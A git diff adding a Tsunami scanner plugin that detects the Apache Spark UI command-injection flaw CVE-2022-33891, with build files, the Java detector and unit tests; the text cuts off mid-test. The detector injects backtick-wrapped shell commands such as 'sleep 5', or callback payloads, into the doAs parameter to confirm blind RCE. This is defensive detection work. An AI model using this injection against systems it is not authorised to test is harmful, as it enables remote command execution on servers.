diff --git a/community/detectors/apache_spark_cve_2022_33891/README.md b/community/detectors/apache_spark_cve_2022_33891/README.md new file mode 100644 index 000000000..8b9e942d4 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/README.md @@ -0,0 +1,27 @@ +# Apache Spark UI CVE-2022-33891 RCE Vulnerability Detector + +This detector checks for Apache Spark UI CVE-2022-33891 RCE vulnerability. + +The Apache Spark UI offers the possibility to enable ACLs via the configuration +option spark.acls.enable. With an authentication filter, this checks whether a +user has access permissions to view or modify the application. If ACLs are +enabled, a code path in HttpSecurityFilter can allow someone to perform +impersonation by providing an arbitrary user name. A malicious user might then +be able to reach a permission check function that will ultimately build a Unix +shell command based on their input, and execute it. This will result in +arbitrary shell command execution as the user Spark is currently running as. +This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, +and versions 3.2.0 to 3.2.1. + +- https://spark.apache.org/security.html#CVE-2022-33891 +- https://nvd.nist.gov/vuln/detail/cve-2022-33891 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_spark_cve_2022_33891/build.gradle b/community/detectors/apache_spark_cve_2022_33891/build.gradle new file mode 100644 index 000000000..ad09ef61b --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/build.gradle @@ -0,0 +1,68 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami CVE-2022-33891 VulnDetector plugin.' +group 'com.google.tsunami' +version '0.0.1-SNAPSHOT' + + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + okhttpVersion = '3.12.0' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..62d4c0535 Binary files /dev/null and b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..622ab64a3 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,5 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew b/community/detectors/apache_spark_cve_2022_33891/gradlew new file mode 100755 index 000000000..fbd7c5158 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/gradlew @@ -0,0 +1,185 @@ +#!/usr/bin/env sh + +# +# Copyright 2015 the original author or authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +## +## Gradle start up script for UN*X +## +############################################################################## + +# Attempt to set APP_HOME +# Resolve links: $0 may be a link +PRG="$0" +# Need this for relative symlinks. +while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG=`dirname "$PRG"`"/$link" + fi +done +SAVED="`pwd`" +cd "`dirname \"$PRG\"`/" >/dev/null +APP_HOME="`pwd -P`" +cd "$SAVED" >/dev/null + +APP_NAME="Gradle" +APP_BASE_NAME=`basename "$0"` + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD="maximum" + +warn () { + echo "$*" +} + +die () { + echo + echo "$*" + echo + exit 1 +} + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "`uname`" in + CYGWIN* ) + cygwin=true + ;; + Darwin* ) + darwin=true + ;; + MINGW* ) + msys=true + ;; + NONSTOP* ) + nonstop=true + ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD="java" + which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." +fi + +# Increase the maximum file descriptors if we can. +if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then + MAX_FD_LIMIT=`ulimit -H -n` + if [ $? -eq 0 ] ; then + if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then + MAX_FD="$MAX_FD_LIMIT" + fi + ulimit -n $MAX_FD + if [ $? -ne 0 ] ; then + warn "Could not set maximum file descriptor limit: $MAX_FD" + fi + else + warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" + fi +fi + +# For Darwin, add options to specify how the application appears in the dock +if $darwin; then + GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" +fi + +# For Cygwin or MSYS, switch paths to Windows format before running java +if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then + APP_HOME=`cygpath --path --mixed "$APP_HOME"` + CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` + + JAVACMD=`cygpath --unix "$JAVACMD"` + + # We build the pattern for arguments to be converted via cygpath + ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` + SEP="" + for dir in $ROOTDIRSRAW ; do + ROOTDIRS="$ROOTDIRS$SEP$dir" + SEP="|" + done + OURCYGPATTERN="(^($ROOTDIRS))" + # Add a user-defined pattern to the cygpath arguments + if [ "$GRADLE_CYGPATTERN" != "" ] ; then + OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" + fi + # Now convert the arguments - kludge to limit ourselves to /bin/sh + i=0 + for arg in "$@" ; do + CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` + CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option + + if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition + eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` + else + eval `echo args$i`="\"$arg\"" + fi + i=`expr $i + 1` + done + case $i in + 0) set -- ;; + 1) set -- "$args0" ;; + 2) set -- "$args0" "$args1" ;; + 3) set -- "$args0" "$args1" "$args2" ;; + 4) set -- "$args0" "$args1" "$args2" "$args3" ;; + 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; + 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; + 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; + 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; + 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; + esac +fi + +# Escape application args +save () { + for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done + echo " " +} +APP_ARGS=`save "$@"` + +# Collect all arguments for the java command, following the shell quoting and substitution rules +eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" + +exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew.bat b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat new file mode 100644 index 000000000..5093609d5 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/gradlew.bat @@ -0,0 +1,104 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%" == "" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%" == "" set DIRNAME=. +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if "%ERRORLEVEL%" == "0" goto init + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto init + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:init +@rem Get command-line arguments, handling Windows variants + +if not "%OS%" == "Windows_NT" goto win9xME_args + +:win9xME_args +@rem Slurp the command line arguments. +set CMD_LINE_ARGS= +set _SKIP=2 + +:win9xME_args_slurp +if "x%~1" == "x" goto execute + +set CMD_LINE_ARGS=%* + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% + +:end +@rem End local scope for the variables with windows NT shell +if "%ERRORLEVEL%"=="0" goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 +exit /b 1 + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_spark_cve_2022_33891/settings.gradle b/community/detectors/apache_spark_cve_2022_33891/settings.gradle new file mode 100644 index 000000000..a4b7269a3 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'CVE-2022-33891' diff --git a/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorBootstrapModule.java b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorBootstrapModule.java new file mode 100644 index 000000000..bd8dbe45b --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorBootstrapModule.java @@ -0,0 +1,26 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202233891; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** An CVE-2023-6014 Guice module that bootstraps the {@link Cve20236014VulnDetector}. */ +public class Cve202233891DetectorBootstrapModule extends PluginBootstrapModule { + @Override + protected void configurePlugin() { + registerPlugin(Cve202233891VulnDetector.class); + } +} diff --git a/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891VulnDetector.java b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891VulnDetector.java new file mode 100644 index 000000000..7681ba043 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891VulnDetector.java @@ -0,0 +1,194 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202233891; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority; + +import com.google.common.base.Stopwatch; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A VulnDetector plugin for CVE 202233891. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2022-33891 Detector", + version = "0.1", + description = "Checks for occurrences of CVE-2022-33891 in Apache Spark installations.", + author = "OccamsXor", + bootstrapModule = Cve202233891DetectorBootstrapModule.class) +@ForWebService +public final class Cve202233891VulnDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + + private static final short SLEEP_CMD_WAIT_DURATION_SECONDS = 5; + + @Inject + Cve202233891VulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = + checkNotNull(httpClient, "HttpClient cannot be null.") + .modify() + .setFollowRedirects(false) + .build(); + this.payloadGenerator = checkNotNull(payloadGenerator, "PayloadGenerator cannot be null."); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(Cve202233891VulnDetector::isWebServiceOrUnknownService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private static boolean isWebServiceOrUnknownService(NetworkService networkService) { + return networkService.getServiceName().isEmpty() + || NetworkServiceUtils.isWebService(networkService) + || NetworkServiceUtils.getServiceName(networkService).equals("unknown"); + } + + private static StringBuilder buildTarget(NetworkService networkService) { + StringBuilder targetUrlBuilder = new StringBuilder(); + if (NetworkServiceUtils.isWebService(networkService)) { + targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService)); + } else { + targetUrlBuilder + .append("https://") + .append(toUriAuthority(networkService.getNetworkEndpoint())) + .append("/"); + } + return targetUrlBuilder; + } + + private boolean isServiceVulnerable(NetworkService networkService) { + return isRceExecutable(networkService); + } + + private boolean isRceExecutable(NetworkService networkService) { + Payload payload; + if (payloadGenerator.isCallbackServerEnabled()) { + // Check callback server is enabled + logger.atInfo().log("Callback server is available!"); + payload = generateCallbackServerPayload(); + String targetUri = + buildTarget(networkService).append("?doAs=`" + payload.getPayload() + "`").toString(); + var request = HttpRequest.get(targetUri).withEmptyHeaders().build(); + + try { + var response = this.httpClient.send(request, networkService); + logger.atInfo().log("Callback Server Payload Response: %s", response.bodyString().get()); + return payload.checkIfExecuted(); + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } else { + // If there is no callback server available, try sleep + logger.atInfo().log("Callback server is not available!"); + Stopwatch stopwatch = Stopwatch.createUnstarted(); + String targetUri = buildTarget(networkService).append("?doAs=`sleep 5`").toString(); + var request = HttpRequest.get(targetUri).withEmptyHeaders().build(); + try { + stopwatch.start(); + var response = this.httpClient.send(request, networkService); + stopwatch.stop(); + logger.atInfo().log("Callback Server Payload Response: %s", response.bodyString().get()); + return stopwatch.elapsed().getSeconds() >= SLEEP_CMD_WAIT_DURATION_SECONDS; + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + stopwatch.stop(); + return false; + } + } + } + + private Payload generateCallbackServerPayload() { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + return this.payloadGenerator.generate(config); + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2022_33891")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2022-33891 Apache Spark UI RCE") + .setDescription( + "The Apache Spark UI has spark.acls.enable configuration option which provides" + + " capability to modify the application according to user's permissions." + + " When the config is true, the vulnerable versions of Spark checks the" + + " group membership of the user without proper controls, that results in" + + " blind command injection in username parameter.") + .setRecommendation( + "You can upgrade your Spark instances to 3.2.2, or 3.3.0 or later")) + .build(); + } +} diff --git a/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithCallbackServerTest.java b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithCallbackServerTest.java new file mode 100644 index 000000000..74d7841b8 --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithCallbackServerTest.java @@ -0,0 +1,149 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202233891; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202233891VulnDetector}. */ +@RunWith(JUnit4.class) +public class Cve202233891DetectorWithCallbackServerTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2022-05-23T00:00:00.00Z")); + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + private NetworkService service; + private TargetInfo targetInfo; + @Inject private Cve202233891VulnDetector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new Cve202233891DetectorBootstrapModule()) + .injectMembers(this); + + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("http")) + .setServiceName("http") + .build(); + + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + // It is a blind RCE, body is not important. This is a part of a valid response. + mockWebServer.enqueue( + new MockResponse() + .setResponseCode(403) + .setBody( + "SERVLET:org.apache.spark.ui.JettyUtils$$anon$1-7439513f\n")); + + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2022_33891")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2022-33891 Apache Spark UI RCE") + .setRecommendation( + "You can upgrade your Spark instances to 3.2.2, or 3.3.0 or later") + .setDescription( + "The Apache Spark UI has spark.acls.enable configuration option which" + + " provides capability to modify the application according to" + + " user's permissions. When the config is true, the vulnerable" + + " versions of Spark checks the group membership of the user" + + " without proper controls, that results in blind command" + + " injection in username parameter.")) + .build()); + assertThat(mockWebServer.getRequestCount()).isEqualTo(1); + assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + mockWebServer.enqueue( + new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody("Hello world!")); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + assertThat(mockWebServer.getRequestCount()).isEqualTo(1); + } +} diff --git a/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithoutCallbackServerTest.java b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithoutCallbackServerTest.java new file mode 100644 index 000000000..0db98810b --- /dev/null +++ b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithoutCallbackServerTest.java @@ -0,0 +1,145 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202233891; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static java.util.concurrent.TimeUnit.SECONDS; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202233891VulnDetector}. */ +@RunWith(JUnit4.class) +public class Cve202233891DetectorWithoutCallbackServerTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2022-05-23T00:00:00.00Z")); + private MockWebServer mockWebServer; + private NetworkService service; + private TargetInfo targetInfo; + + @Inject private 